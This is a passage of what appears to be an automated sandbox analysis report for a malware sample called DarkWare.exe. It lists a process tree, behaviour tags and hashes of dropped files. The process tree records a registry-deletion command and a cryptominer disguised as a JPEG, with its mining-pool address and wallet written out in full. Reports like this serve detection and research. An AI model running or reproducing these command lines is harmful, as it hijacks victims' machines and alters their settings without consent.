C:\Windows\system32\reg.exeREG DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged /f5⤵PID:3004
-
-
-
C:\ProgramData\CuteCats.jpegC:\ProgramData\CuteCats.jpeg -a kawpow -i 20 -o stratum+tcp://rvn.2miners.com:6060 -u RPUFwA26gSfphDcuv9hFe2LFLJxZcQzm8D.adraf -p x --api-bind-http 04⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3940
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DarkWare.exe"C:\Users\Admin\AppData\Local\Temp\DarkWare.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:3812
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
38.3MB
MD540532ea36c2d4de56522ecf707bf289e
SHA186520c67e37b43366f965b63ba78070688bff83e
SHA25608e994aa4659a0fd4674d93ed9e683dff7c020013629e39d6ea73091f2bcd33b
SHA51241df9cc910afe6ffe7f92e1e26b607cf7fea18f52a746ca97d532406401035b5bb3ac5ebcb9bc659d4125cbf7262383aefc1f03a01886dc71e268b52ac2b43ce
-
Filesize
1KB
MD57fb5fa1534dcf77f2125b2403b30a0ee
SHA1365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA25633a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD5b1151d0c33a64249dfe5438ccbf7e07d
SHA132d2efc9b30b76351262ed9b0280523a3ba40f8d
SHA2560e5ff19ce721619034220513670da3cd0dd0c076aa974c84a6605577314c3bb2
SHA51277123e6607c30fed85518ad69d864cde3f6df3eab9a5cecb050c309dfe1990a8a53835f10db495d9a50df11c4f9455d3ed617821f44215f28c6eed788100e2d6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD53e9e9e37c7693cda22a330e4c5f929ba
SHA15e5844c975927ad552f7202c25d778198924df6f
SHA256232d25d173bb3eb09b46efcd76d98648a77e5761b46c8db56b15085f4c9c22f9
SHA5120d69be3ba02ef8b8c4d2de56830052eca2d876db5803f3052b99ba55ef06ee7bffb5120a64fb8be367853fef327ecdf0ed35932a1e311c70db9ef7a7c17449a1
-
Filesize
163B
MD57f20048f8da6e42dfd6331bd96b8dd02
SHA190126e36609efec7cbeacae5dc8e001c71f14761
SHA2565dfd0b7798205499580908d5606fb0c9477ac5218549c3f8d4b5cefdebbd3ff8
SHA512adf540254f5d6b5c3881dfe2d4a801d9302adf8fbac2fbf2dfcc15542cb77ec311336c783b806631ad7f3d065e732889e0bf5dcd42eaff1c33de1c828f4d6cac
-
Filesize
165B
MD5ab0379ed0567d54fb857c1c640fff854
SHA13eaa495d3367f30f4d02d211e2063cf4e4b7746c
SHA256348d1154d5b372aeca319a459e6b780a5b6c68f6035c32a6f5bbcd8540f23297
SHA512493270c842e754b3d10bd1a116b78b70e38bdbf9d72522e08191aa9f91d2c8ae4f876a4c64389c8dcef19e64ed509f394af7372fd670ec430b91a2d6490c833d
-
Filesize
120B
MD52a5c3c98c3398680dd3e4caaf4283721
SHA13a3a80594c3001c51769f92bdd9e9bc71474f1bb
SHA256054e4c4699aef7aae33a8fe1c758c75d7a351ffa9f6184e59093031bebf67e70
SHA5125722337a6128d60b8110f6e5ee6618453eae3ad54320bf27dc43a6ca333c0d8333df027647a588f8fa890cb6ec7e0921b2597216ea48c593c2c6c2008603d786
-
Filesize
217B
MD57b27754f38364499d2e3ca7545e595dd
SHA1fda34f6a52c365cc923c24efe91c1e5872fb35ca
SHA2564c9a72709d68a7a8de1c0671ef22b1418d738b593d6d4a2fec2db30858be9418
SHA51203e0c9807e62a462207eb7fdec44bb07b19c80753093777c99045c168f881feab4245bc874942bb7943a4219610e04e2a8a343b5922fdffaa68828d333670303
-
Filesize
138KB
MD56fe439b4f5cf20c00b987658efc382ab
SHA12828e90db93c67305bffaa2c073de74f04624bf8
SHA256463dd3b1a23e58e02389bc85d414c29a345e1f68ce083dcb97f9e969b99b3e81
SHA512c269f578b399921e5701c43a4f6ee25f23427e32782af4611f65ae42f4a823751ca8a296ccb383c17cc91c0d8d4975f5a85a4a368e8e424dfb2748051941befd
-
Filesize
125B
MD58b4ed5c47fdddbeba260ef11cfca88c6
SHA1868f11f8ed78ebe871f9da182d053f349834b017
SHA256170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
SHA51287e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf
-
Filesize
1.9MB
MD52fe735b8323f0a8ad747737d3f3bc183
SHA14c42b0dc2fe774cb09eb1049897cb2f4205e318c
SHA2566d7a95d3cfd8acdf6e3fafbbe35130db3da4d7281918bce6eb226bc5488f91d5
SHA512022fac37dab002298231c9288c08ed13d812a1ac93c07064d386b539ac6141b39439dec676f70e3677fb89b6482f2ee475d19c67f90b634d5fa06e806f1fd17a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
230KB
MD5f08723bcb5c94651b8df18a3ad027460
SHA1e9f855543aab8f383a34d6a738889034daa6b5a3
SHA256b8ca9e14e7adaa62220329b33138336146a2b3188215fcbd38365efc2f756460
SHA5123f647c85345e08d533d15a3fab7394da3caff2b4fdbaaa83946321312f3f17d5cba018309d4b2206f083f9fd90f568c27399932c2ae5ae79200a05d6dd0da589